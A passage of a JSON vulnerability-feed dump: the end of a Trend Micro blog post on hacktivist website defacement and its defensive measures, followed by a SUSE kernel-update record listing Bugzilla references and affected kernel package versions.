attack, as well as subcampaigns like #OpCharlie, #OpCharlieHebdo and #AntiCharlieHebdo. Most of the activity that took place in connection with these campaigns happened directly after the attack, reaching a peak on Jan. 11, 2015. However, defacements associated with the Charlie Hebdo attack took place all the way through September 2016.\n\nDigital vandalism was supported by an array of hacking groups from Syria, Morocco, Bangladesh, Indonesia and elsewhere, and centered around French websites that appeared to be sympathetic to the magazine. Defacements included pro-Muslim and pro-Islamic messages.\n\nThese are hardly the only examples of digital vandalism taking place according to hacktivist campaigns. [Check out Trend Micro's full report to see additional activity](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/web-defacements-exploring-the-methods-of-hacktivists>).\n\n### Safeguarding websites from hacktivist defacement\n\nWhile many defacement events come as responses to specific events, every organization should take the time to ensure that their website is safeguarded against this kind of unauthorized access. Defacement takes a considerable toll, particularly when current and potential customers and partners cannot access the portals, capabilities and information the website typically offers.\n\nHere are a few [security best practices](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/web-defacements-exploring-the-methods-of-hacktivists>) to keep in mind:\n\n * **Ensure systems are patched. **Any known vulnerabilities could be used to breach and attack the website. Virtual patching is imperative, and a solution like Trend Micro's [Deep Security](<https://www.trendmicro.com/en_us/business/products/hybrid-cloud/deep-security-data-center.html>) for webserver protection is a beneficial way to manage and maintain patches and updates.\n * **Use strong passwords. **Default passwords should be replaced with more robust credentials that include a mix of numbers, letters and special characters and cannot be easily guessed.\n * **Leverage security at the web application level.** This includes web app firewalls to monitor activity and guard against traffic that could threaten website performance and usability.\n\nTo find out more about protecting your organization's website - including with advanced solutions like Trend Micro Deep Security and Vulnerability Protection - [connect with our security experts today](<https://www.trendmicro.com/en_us/business/products/all-solutions.html>).\n\nThe post [Graffiti in the digital world: How hacktivists use defacement](<https://blog.trendmicro.com/graffiti-in-the-digital-world-how-hacktivists-use-defacement/>) appeared first on [](<https://blog.trendmicro.com>).", "reporter": "Trend Micro", "published": "2018-04-25T21:34:24", "type": "trendmicroblog", "title": "Graffiti in the digital world: How hacktivists use defacement", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-25T21:34:24", "id": "TRENDMICROBLOG:5594DAE038C2DD45B4B4ACBAB46714AC", "href": "https://blog.trendmicro.com/graffiti-in-the-digital-world-how-hacktivists-use-defacement/", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2018-04-25T23:36:09", "references": ["https://bugzilla.suse.com/1078669", "https://bugzilla.suse.com/1080813", "https://bugzilla.suse.com/1063516", "https://bugzilla.suse.com/909077", "https://bugzilla.suse.com/1067118", "https://bugzilla.suse.com/1088260", "https://bugzilla.suse.com/1083275", "https://bugzilla.suse.com/1085331", "https://bugzilla.suse.com/1088147", "https://bugzilla.suse.com/1010470", "https://bugzilla.suse.com/1086162", "https://bugzilla.suse.com/1087762", "https://bugzilla.suse.com/1013018", "https://bugzilla.suse.com/1083494", "https://bugzilla.suse.com/1075994", "https://bugzilla.suse.com/1078672", "https://bugzilla.suse.com/1075091", "https://bugzilla.suse.com/1087260", "https://bugzilla.suse.com/1085113", "https://bugzilla.suse.com/1083483", "https://bugzilla.suse.com/1067912", "https://bugzilla.suse.com/1039348", "https://bugzilla.suse.com/1085279", "https://bugzilla.suse.com/940776", "https://bugzilla.suse.com/1065600", "https://bugzilla.suse.com/1078674", "https://bugzilla.suse.com/1084536", "https://bugzilla.suse.com/1082091", "https://bugzilla.suse.com/1062568", "https://bugzilla.suse.com/1072689", "https://bugzilla.suse.com/1063416", "https://bugzilla.suse.com/943786", "https://bugzilla.suse.com/1068032", "https://bugzilla.suse.com/1062840", "https://bugzilla.suse.com/1085513", "https://bugzilla.suse.com/1082424", "https://bugzilla.suse.com/1083242", "https://bugzilla.suse.com/1065999", "https://bugzilla.suse.com/1080757", "https://bugzilla.suse.com/1080464", "https://bugzilla.suse.com/1078673", "https://bugzilla.suse.com/1087092", "https://bugzilla.suse.com/1081358", "https://bugzilla.suse.com/1052943", "https://bugzilla.suse.com/1075088", "https://bugzilla.suse.com/1072865", "https://bugzilla.suse.com/1089608"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-source-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-trace-devel-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-extra-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-bigmem-devel-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-bigmem-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-extra-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-ec2-devel-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-ec2-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-syms-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-extra-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-trace-base-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-debugsource-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-debuginfo-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-base-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-debugsource-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-bigmem-base-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-bigmem-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-devel-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-extra-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-trace-debugsource-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-devel-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-base-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-devel-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-syms-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-debugsource-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-bigmem-debugsource-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-bigmem-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-extra-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-base-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-debuginfo-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-ec2-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-ec2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-extra-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-bigmem-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-bigmem", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-devel-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-syms-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-devel-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-devel-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-extra-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-debugsource-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-debugsource-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-debugsource-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-base-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-base-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-devel-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-devel-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-devel-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-source-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-debuginfo-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-ec2-debugsource-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-ec2-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-bigmem-debuginfo-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-bigmem-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-devel-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-trace-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-ec2-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-ec2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-ec2-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-ec2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-debuginfo-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-devel-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-extra-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-extra-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-trace-debuginfo-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-source-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-base-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-base-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-debugsource-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-ec2-base-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-ec2-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-devel-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-base-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-ec2-debugsource-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-ec2-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-base-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-devel-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-ec2-base-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-ec2-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "noarch", "packageFilename": "kernel-docs-3.0.101-108.38.1.noarch.rpm", "packageName": "kernel-docs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-devel-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-debuginfo-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-base-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-syms-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-syms-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-devel-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-extra-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-source-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-debugsource-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-debugsource-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-devel-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-base-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": 